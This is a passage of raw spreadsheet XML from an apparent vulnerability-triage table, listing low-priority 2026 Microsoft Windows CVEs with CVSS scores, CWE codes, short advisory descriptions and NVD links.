t="inlineStr" /><c r="H1261" s="5" t="n"><v>0.004</v></c><c r="I1261" s="5" t="inlineStr" /><c r="J1261" s="5" t="inlineStr" /><c r="K1261" s="5" t="inlineStr" /><c r="L1261" s="5" t="inlineStr" /><c r="M1261" s="5" t="inlineStr" /><c r="N1261" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1261" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1261" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1261" s="5" t="inlineStr" /><c r="R1261" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1261" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1261" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69345</t></is></c></row><row r="1262"><c r="A1262" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1262" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1262" s="5" t="inlineStr"><is><t>CVE-2026-69351</t></is></c><c r="D1262" s="5" t="n"><v>5.5</v></c><c r="E1262" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1262" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1262" s="5" t="inlineStr" /><c r="H1262" s="5" t="n"><v>0.005</v></c><c r="I1262" s="5" t="inlineStr" /><c r="J1262" s="5" t="inlineStr" /><c r="K1262" s="5" t="inlineStr" /><c r="L1262" s="5" t="inlineStr" /><c r="M1262" s="5" t="inlineStr" /><c r="N1262" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1262" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1262" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1262" s="5" t="inlineStr" /><c r="R1262" s="5" t="inlineStr"><is><t>CWE-359</t></is></c><c r="S1262" s="5" t="inlineStr"><is><t>Exposure of private personal information to an unauthorized actor in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to disclose information locally.</t></is></c><c r="T1262" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69351</t></is></c></row><row r="1263"><c r="A1263" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1263" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1263" s="5" t="inlineStr"><is><t>CVE-2026-69353</t></is></c><c r="D1263" s="5" t="n"><v>5.5</v></c><c r="E1263" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1263" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1263" s="5" t="inlineStr" /><c r="H1263" s="5" t="n"><v>0.004</v></c><c r="I1263" s="5" t="inlineStr" /><c r="J1263" s="5" t="inlineStr" /><c r="K1263" s="5" t="inlineStr" /><c r="L1263" s="5" t="inlineStr" /><c r="M1263" s="5" t="inlineStr" /><c r="N1263" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1263" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1263" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1263" s="5" t="inlineStr" /><c r="R1263" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1263" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Text Shaping allows an authorized attacker to disclose information locally.</t></is></c><c r="T1263" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69353</t></is></c></row><row r="1264"><c r="A1264" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1264" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1264" s="5" t="inlineStr"><is><t>CVE-2026-69367</t></is></c><c r="D1264" s="5" t="n"><v>5.5</v></c><c r="E1264" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1264" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1264" s="5" t="inlineStr" /><c r="H1264" s="5" t="n"><v>0.004</v></c><c r="I1264" s="5" t="inlineStr" /><c r="J1264" s="5" t="inlineStr" /><c r="K1264" s="5" t="inlineStr" /><c r="L1264" s="5" t="inlineStr" /><c r="M1264" s="5" t="inlineStr" /><c r="N1264" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1264" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1264" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1264" s="5" t="inlineStr" /><c r="R1264" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1264" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1264" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69367</t></is></c></row><row r="1265"><c r="A1265" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1265" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1265" s="5" t="inlineStr"><is><t>CVE-2026-69369</t></is></c><c r="D1265" s="5" t="n"><v>5.5</v></c><c r="E1265" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1265" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1265" s="5" t="inlineStr" /><c r="H1265" s="5" t="n"><v>0.003</v></c><c r="I1265" s="5" t="inlineStr" /><c r="J1265" s="5" t="inlineStr" /><c r="K1265" s="5" t="inlineStr" /><c r="L1265" s="5" t="inlineStr" /><c r="M1265" s="5" t="inlineStr" /><c r="N1265" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1265" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1265" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1265" s="5" t="inlineStr" /><c r="R1265" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1265" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DNS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1265" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69369</t></is></c></row><row r="1266"><c r="A1266" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1266" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1266" s="5" t="inlineStr"><is><t>CVE-2026-69376</t></is></c><c r="D1266" s="5" t="n"><v>5.5</v></c><c r="E1266" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1266" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1266" s="5" t="inlineStr" /><c r="H1266" s="5" t="n"><v>0.004</v></c><c r="I1266" s="5" t="inlineStr" /><c r="J1266" s="5" t="inlineStr" /><c r="K1266" s="5" t="inlineStr" /><c r="L1266" s="5" t="inlineStr" /><c r="M1266" s="5" t="inlineStr" /><c r="N1266" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1266" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1266" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1266" s="5" t="inlineStr" /><c r="R1266" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1266" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1266" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69376</t></is></c></row><row r="1267"><c r="A1267" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1267" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1267" s="5" t="inlineStr"><is><t>CVE-2026-69390</t></is></c><c r="D1267" s="5" t="n"><v>5.5</v></c><c r="E1267" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1267" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1267" s="5" t="inlineStr" /><c r="H1267" s="5" t="n"><v>0.004</v></c><c r="I1267" s="5" t="inlineStr" /><c r="J1267" s="5" t="inlineStr" /><c r="K1267" s="5" t="inlineStr" /><c r="L1267" s="5" t="inlineStr" /><c r="M1267" s="5" t="inlineStr" /><c r="N1267" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1267" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1267" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1267" s="5" t="inlineStr" /><c r="R1267" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1267" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t></is></c><c r="T1267" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69390</t></is></c></row><row r="1268"><c r="A1268" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1268" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1268" s="5" t="inlineStr"><is><t>CVE-2026-69403</t></is></c><c r="D1268" s="5" t="n"><v>5.5</v></c><c r="E1268" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1268" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1268" s="5" t="inlineStr" /><c r="H1268" s="5" t="n"><v>0.003</v></c><c r="I1268" s="5" t="inlineStr" /><c r="J1268" s="5" t="inlineStr" /><c r="K1268" s="5" t="inlineStr" /><c r="L1268" s="5" t="inlineStr" /><c r="M1268" s="5" t="inlineStr" /><c r="N1268" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1268" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1268" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1268" s="5" t="inlineStr" /><c r="R1268" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1268" s="5" t="inlineStr"><is><t>Missing authorization in Windows SMB Server allows an authorized attacker to disclose information locally.</t></is></c><c r="T1268" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69403</t></is></c></row><row r="1269"><c r="A1269" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1269" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1269" s="5" t="inlineStr"><is><t>CVE-2026-69406</t></is></c><c r="D1269" s="5" t="n"><v>5.5</v></c><c r="E1269" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1269" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1269" s="5" t="inlineStr" /><c r="H1269" s="5" t="n"><v>0.005</v></c><c r="I1269" s="5" t="inlineStr" /><c r="J1269" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K126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69" s="5" t="inlineStr" /><c r="M1269" s="5" t="inlineStr" /><c r="N1269" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1269" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1269" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1269" s="5" t="inlineStr" /><c r="R1269" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1269" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows Kernel allows an authorized attacker to disclose information locally.</t></is></c><c r="T1269" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69406</t></is></c></row><row r="1270"><c r="A1270" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1270" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1270" s="5" t="inlineStr"><is><t>CVE-2026-69453</t></is></c><c r="D1270" s="5" t="n"><v>5.5</v></c><c r="E1270" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1270" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1270" s="5" t="inlineStr" /><c r="H1270" s="5" t="n"><v>0.003</v></c><c r="I1270" s="5" t="inlineStr" /><c r="J1270" s="5" t="inlineStr" /><c r="K1270" s="5" t="inlineStr" /><c r="L1270" s="5" t="inlineStr" /><c r="M1270" s="5" t="inlineStr" /><c r="N1270" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1270" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1270" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1270" s="5" t="inlineStr" /><c r="R1270" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1270" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Windows Search Component allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1270" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69453</t></is></c></row><row r="1271"><c r="A1271" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1271" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1271" s="5" t="inlineStr"><is><t>CVE-2026-69457</t></is></c><c r="D1271" s="5" t="n"><v>5.5</v></c><c r="E1271" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1271" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1271" s="5" t="inlineStr" /><c r="H1271" s="5" t="n"><v>0.004</v></c><c r="I1271" s="5" t="inlineStr" /><c r="J1271" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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1" s="5" t="inlineStr" /><c r="M1271" s="5" t="inlineStr" /><c r="N1271" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1271" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1271" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1271" s="5" t="inlineStr" /><c r="R1271" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1271" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1271" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69457</t></is></c></row><row r="1272"><c r="A1272" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1272" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1272" s="5" t="inlineStr"><is><t>CVE-2026-69504</t></is></c><c r="D1272" s="5" t="n"><v>5.5</v></c><c r="E1272" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1272" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1272" s="5" t="inlineStr" /><c r="H1272" s="5" t="n"><v>0.004</v></c><c r="I1272" s="5" t="inlineStr" /><c r="J1272" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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2" s="5" t="inlineStr" /><c r="M1272" s="5" t="inlineStr" /><c r="N1272" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1272" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1272" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1272" s="5" t="inlineStr" /><c r="R1272" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1272" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1272" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69504</t></is></c></row><row r="1273"><c r="A1273" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1273" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1273" s="5" t="inlineStr"><is><t>CVE-2026-69527</t></is></c><c r="D1273" s="5" t="n"><v>5.5</v></c><c r="E1273" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1273" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1273" s="5" t="inlineStr" /><c r="H1273" s="5" t="n"><v>0.004</v></c><c r="I1273" s="5" t="inlineStr" /><c r="J1273" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K127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3" s="5" t="inlineStr" /><c r="M1273" s="5" t="inlineStr" /><c r="N1273" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1273" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1273" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1273" s="5" t="inlineStr" /><c r="R1273" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1273" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Mass Storage Class Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1273" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69527</t></is></c></row><row r="1274"><c r="A1274" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1274" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1274" s="5" t="inlineStr"><is><t>CVE-2026-69531</t></is></c><c r="D1274" s="5" t="n"><v>5.5</v></c><c r="E1274" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1274" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1274" s="5" t="inlineStr" /><c r="H1274" s="5" t="n"><v>0.003</v></c><c r="I1274" s="5" t="inlineStr" /><c r="J1274" s="5" t="inlineStr" /><c r="K1274" s="5" t="inlineStr" /><c r="L1274" s="5" t="inlineStr" /><c r="M1274" s="5" t="inlineStr" /><c r="N1274" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1274" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1274" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1274" s="5" t="inlineStr" /><c r="R1274" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S1274" s="5" t="inlineStr"><is><t>Unintended proxy or intermediary ('confused deputy') in Microsoft Windows Speech allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1274" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69531</t></is></c></row><row r="1275"><c r="A1275" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1275" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1275" s="5" t="inlineStr"><is><t>CVE-2026-69554</t></is></c><c r="D1275" s="5" t="n"><v>5.5</v></c><c r="E1275" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1275" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1275" s="5" t="inlineStr" /><c r="H1275" s="5" t="n"><v>0.003</v></c><c r="I1275" s="5" t="inlineStr" /><c r="J1275" s="5" t="inlineStr" /><c r="K1275" s="5" t="inlineStr" /><c r="L1275" s="5" t="inlineStr" /><c r="M1275" s="5" t="inlineStr" /><c r="N1275" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1275" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1275" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1275" s="5" t="inlineStr" /><c r="R1275" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1275" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Microsoft Windows Search Component allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1275" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69554</t></is></c></row><row r="1276"><c r="A1276" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1276" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1276" s="5" t="inlineStr"><is><t>CVE-2026-69568</t></is></c><c r="D1276" s="5" t="n"><v>5.5</v></c><c r="E1276" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1276" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1276" s="5" t="inlineStr" /><c r="H1276" s="5" t="n"><v>0.004</v></c><c r="I1276" s="5" t="inlineStr" /><c r="J1276" s="5" t="inlineStr" /><c r="K1276" s="5" t="inlineStr" /><c r="L1276" s="5" t="inlineStr" /><c r="M1276" s="5" t="inlineStr" /><c r="N1276" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1276" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1276" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1276" s="5" t="inlineStr" /><c r="R1276" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1276" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Storage Spaces Controller allows an authorized attacker to disclose information locally.</t></is></c><c r="T1276" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69568</t></is></c></row><row r="1277"><c r="A1277" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1277" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1277" s="5" t="inlineStr"><is><t>CVE-2026-69609</t></is></c><c r="D1277" s="5" t="n"><v>5.5</v></c><c r="E1277" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1277" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1277" s="5" t="inlineStr" /><c r="H1277" s="5" t="n"><v>0.004</v></c><c r="I1277" s="5" t="inlineStr" /><c r="J1277" s="5" t="inlineStr" /><c r="K1277" s="5" t="inlineStr" /><c r="L1277" s="5" t="inlineStr" /><c r="M1277" s="5" t="inlineStr" /><c r="N1277" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1277" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1277" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1277" s="5" t="inlineStr" /><c r="R1277" s="5" t="inlineStr"><is><t>CWE-125, CWE-193</t></is></c><c r="S1277" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to disclose information locally.</t></is></c><c r="T1277" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69609</t></is></c></row><row r="1278"><c r="A1278" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1278" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1278" s="5" t="inlineStr"><is><t>CVE-2026-69616</t></is></c><c r="D1278" s="5" t="n"><v>5.5</v></c><c r="E1278" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1278" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1278" s="5" t="inlineStr" /><c r="H1278" s="5" t="n"><v>0.004</v></c><c r="I1278" s="5" t="inlineStr" /><c r="J1278" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K127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8" s="5" t="inlineStr" /><c r="M1278" s="5" t="inlineStr" /><c r="N1278" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1278" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1278" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1278" s="5" t="inlineStr" /><c r="R1278" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1278" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Remote Desktop Services allows an authorized attacker to disclose information locally.</t></is></c><c r="T1278" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69616</t></is></c></row><row r="1279"><c r="A1279" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1279" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1279" s="5" t="inlineStr"><is><t>CVE-2026-69618</t></is></c><c r="D1279" s="5" t="n"><v>5.5</v></c><c r="E1279" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1279" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1279" s="5" t="inlineStr" /><c r="H1279" s="5" t="n"><v>0.004</v></c><c r="I1279" s="5" t="inlineStr" /><c r="J1279" s="5" t="inlineStr" /><c r="K1279" s="5" t="inlineStr" /><c r="L1279" s="5" t="inlineStr" /><c r="M1279" s="5" t="inlineStr" /><c r="N1279" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1279" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1279" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1279" s="5" t="inlineStr" /><c r="R1279" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1279" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows SMB Client allows an authorized attacker to disclose information locally.</t></is></c><c r="T1279" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69618</t></is></c></row><row r="1280"><c r="A1280" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1280" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1280" s="5" t="inlineStr"><is><t>CVE-2026-69627</t></is></c><c r="D1280" s="5" t="n"><v>5.5</v></c><c r="E1280" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1280" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1280" s="5" t="inlineStr" /><c r="H1280" s="5" t="n"><v>0.004</v></c><c r="I1280" s="5" t="inlineStr" /><c r="J1280" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K128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0" s="5" t="inlineStr" /><c r="M1280" s="5" t="inlineStr" /><c r="N1280" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1280" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1280" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1280" s="5" t="inlineStr" /><c r="R1280" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1280" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Remote Desktop Licensing Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1280" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69627</t></is></c></row><row r="1281"><c r="A1281" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1281" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1281" s="5" t="inlineStr"><is><t>CVE-2026-69672</t></is></c><c r="D1281" s="5" t="n"><v>5.5</v></c><c r="E1281" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1281" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1281" s="5" t="inlineStr" /><c r="H1281" s="5" t="n"><v>0.004</v></c><c r="I1281" s="5" t="inlineStr" /><c r="J1281" s="5" t="inlineStr" /><c r="K1281" s="5" t="inlineStr" /><c r="L1281" s="5" t="inlineStr" /><c r="M1281" s="5" t="inlineStr" /><c r="N1281" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1281" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1281" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1281" s="5" t="inlineStr" /><c r="R1281" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1281" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows DNS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1281" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69672</t></is></c></row><row r="1282"><c r="A1282" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1282" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1282" s="5" t="inlineStr"><is><t>CVE-2026-69674</t></is></c><c r="D1282" s="5" t="n"><v>5.5</v></c><c r="E1282" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1282" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1282" s="5" t="inlineStr" /><c r="H1282" s="5" t="n"><v>0.003</v></c><c r="I1282" s="5" t="inlineStr" /><c r="J1282" s="5" t="inlineStr" /><c r="K1282" s="5" t="inlineStr" /><c r="L1282" s="5" t="inlineStr" /><c r="M1282" s="5" t="inlineStr" /><c r="N1282" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1282" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1282" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1282" s="5" t="inlineStr" /><c r="R1282" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1282" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Modern Device Management (MDM) allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="T1282" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69674</t></is></c></row><row r="1283"><c r="A1283" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1283" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1283" s="5" t="inlineStr"><is><t>CVE-2026-69684</t></is></c><c r="D1283" s="5" t="n"><v>5.5</v></c><c r="E1283" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1283" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1283" s="5" t="inlineStr" /><c r="H1283" s="5" t="n"><v>0.005</v></c><c r="I1283" s="5" t="inlineStr" /><c r="J1283" s="5" t="inlineStr" /><c r="K1283" s="5" t="inlineStr" /><c r="L1283" s="5" t="inlineStr" /><c r="M1283" s="5" t="inlineStr" /><c r="N1283" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1283" 